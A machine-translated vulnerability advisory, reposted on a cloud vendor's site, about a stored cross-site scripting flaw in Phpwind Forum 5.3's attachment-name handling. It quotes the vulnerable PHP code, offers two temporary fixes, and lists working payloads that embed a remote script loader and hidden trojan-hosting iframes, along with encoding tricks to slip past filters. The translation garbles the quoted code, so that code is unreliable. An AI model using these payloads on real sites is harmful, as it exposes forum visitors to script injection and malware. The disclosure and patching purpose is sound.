Phpwind Forum 5.3 postupload. php attachment file name Cross-Site Scripting Vulnerability

Last Update:2018-12-05 Source: Internet

Author: User

Tags mysql query

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Note: This is just a vulnerability announcement that is not original in the general sense. Therefore, it is used to publish an account. I would like to thank fragment, lazy week, ring04h and other members for their discussions. The MIIT Information Security Team has submitted the vulnerability to phpwind.

Phpwind forums v5.3 postupload. php Cross Site Script (XSS)
Phpwind Forum 5.3 postupload. php file Cross-Site Scripting Vulnerability (XSS)

Vulnerability generation:
The require \ postupload. php file does not strictly filter the atc_attachment_name variable, causing cross-site scripting and malicious code embedding on the site.
Memory fragments initially provide a test result:

Vulnerability code analysis:
The following is the source code that causes problems in the require \ postupload. php file:
......
$ Source = $ db_ifftp? $ Db_ftpweb. "/". $ fileuplodeurl: $ attachdir. '/'. $ fileuplodeurl;
// Forum ID _ file name _ time. Type
If ($ db_ifftp ){
$ Ftpsize = $ FTP-> upload ($ atc_attachment, $ fileuplodeurl );
} Elseif (! Postupload ($ atc_attachment, $ source )){
Showmsg ('upload _ error ');
}
If (eregi ("\. (GIF | JPG | PNG | BMP | SWF) $ ", $ atc_attachment_name) & function_exists ('getimagesize') {// only the extension is filtered here
If (! $ Img_size = getimagesize ($ source )){
$ Db_ifftp? $ FTP-> Delete ($ fileuplodeurl): p_unlink ($ source );
Showmsg ('upload _ content_error ');
}
If (! $ Db_ifftp & $ attach_ext! = 'Swf '& $ db_watermark & $ img_size [0]> $ db_waterwidth & $ img_size [1]> $ db_waterheight ){
If (function_exists ('imagecreatefromgif') & function_exists ('imagealphablending') & ($ attach_ext! = 'Gif' | function_exists ('imagegif') & ($ db_ifgif = 2 | $ db_ifgif = 1 & in_array (php_version, array ('4. 4.3 ', '4. 4.4 ', '5. 1.5 ') & ($ db_waterimg & function_exists ('imagecopymerge') |! $ Db_waterimg & function_exists ('imagettfbbox '))){
Require_once (R_p. 'require/watermark. php'); imgwatermark ($ source, $ db_waterpos, $ region, $ db_watertext, $ db_waterfont, $ db_watercolor, $ db_waterpct, $ db_jpgquality );
}
}
}
If (eregi ("\. (GIF | JPG | JPEG | PNG | BMP | SWF) $", $ atc_attachment_name) {// only the extension is filtered here
$ Ifupload = 1;
If (eregi ("\. SWF $", $ atc_attachment_name) {// only the extension is filtered here
$ Type = 'zip ';
} Else {
$ Type = 'img ';
}
} Elseif (eregi ("\. (ZIP | RAR) $", $ atc_attachment_name) {// only the extension is filtered here
$ Ifupload = 3;
$ Type = 'zip ';
} Elseif (eregi ("\. txt $", $ atc_attachment_name) {// only the extension is filtered here
$ Safecheckdb = $ db_ifftp? (Function_exists ('file _ get_contents ')? File_get_contents ($ source): ''): readover ($ source );
If (strpos ($ safecheckdb, "onLoad ")! = False & strpos ($ safecheckdb, "Submit ")! = False & strpos ($ safecheckdb, "Post ")! = False & strpos ($ safecheckdb, "form ")! = False ){
$ Db_ifftp? $ FTP-> Delete ($ fileuplodeurl): p_unlink ($ source );
Showmsg ('upload _ content_error ');
} Else {
$ Ifupload = 2;
$ Type = 'txt ';
}
} Else {
$ Ifupload = 3;
$ Type = 'zip ';
}
$ Size = $ db_ifftp? Ceil ($ ftpsize/1024): Ceil (filesize ("$ attachdir/$ fileuplodeurl")/1024 );
$ Atc_attachment_name = addslashes ($ atc_attachment_name );
If ($ ifreplace = 0) {// The following table has been submitted to the database.
$ Db-> Update ("insert into pw_attachs set FID = '$ fid', uid =' $ winduid', hits = 0, name = '$ atc_attachment_name ', type = '$ type', size =' $ size', attachurl = '$ fileuplodeurl', needrvrc = '$ needrvrc', uploadtime = '$ timestamp ', descrip = '$ descrip '");
$ Aid = $ db-> insert_id ();
$ Attachs [$ aid] = array (
'Aid '=> $ aid,
'Name' => stripslashes ($ atc_attachment_name)
'Type' => $ type,
'Attachurl' => $ fileuplodeurl,
'Needrvrc '=> $ needrvrc,
'SIZE' => $ size,
'Others' => 0,
'Desc' => str_replace ('\', '', $ descrip)
);
} Else {
$ Aid = $ replacedb [$ I] ['aid '];
$ Db-> Update ("Update pw_attachs set name = '$ atc_attachment_name', type = '$ type', size =' $ size', attachurl = '$ fileuplodeurl ', needrvrc = '$ needrvrc', uploadtime = '$ timestamp', descrip =' $ descrip 'where aid =' $ aid '");
$ Oldattach [$ aid] ['name'] = $ atc_attachment_name;
$ Oldattach [$ aid] ['type'] = $ type;
$ Oldattach [$ aid] ['SIZE'] = $ size;
}
}
......
The postupload. php file does not filter the names submitted by the atc_attachment_name variable.

Vulnerability Testing:
You only need to fill in a specially crafted malicious Cross-Site Script in the address box submitted by the attachment (not the description box) to implement cross-site testing, which can be used by others for Trojans.
Test Method 1: The following is the test code and image provided by zhouzhen:

The plain text of the old Zhou code is as follows:
D: \ zhouzhen xxs.rar

Because it cannot contain characters such as //, you can use assic encoding to embed malicious scripts.

Temporary repair:
Repair Method 1 Regular Expression:
After line 3 of the source code (45 lines of the code block above), that is, filtering the final file name before the MySQL query is executed.
If (isset ($ atc_attachment_name )){
If (! Eregi ("^ [_ a-z0-9-] + \. (GIF | JPG | JPEG | PNG | BMP | zip | RAR | GZ | tgz | 7z) $ ", $ atc_attachment_name )) {// you can change the extension rules based on your website.
Echo "est name fail! ";
Exit;
}
}
Patch method 2 string replacement:
To temporarily solve the cross-site problem, you can filter out the angle brackets to prevent scripts from being formed.
Modify the source code line 157 (that is, line 51 of the code block above) to the following code:
$ Atc_attachment_name = stripslashes (str_replace ("<", "", $ atc_attachment_name ));

Ring04h:
Enter in the attachment:
D: \ ring04h: <SCRIPT src = http://www.diaonilaomu.com/x.js> xss.rar
Convert to assic encoded POST:

Black virus:
You do not need to remotely call JS files or directly mount the trojan as follows:
Local test environment: phpwind5.0.1
D: \ zhouzhen <IFRAME src = http://www.muma.com/> <% 2 w.rame> xxs.rar

D: \ zhouzhen <IFRAME src = http://www.muma.com/test.htm width = 0 Height = 0> <% 2 w.rame> xxs.rar
The/and are filtered out. The constructor statements are as follows.
Http://www.muma.com/test.htm hexadecimal encoding.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More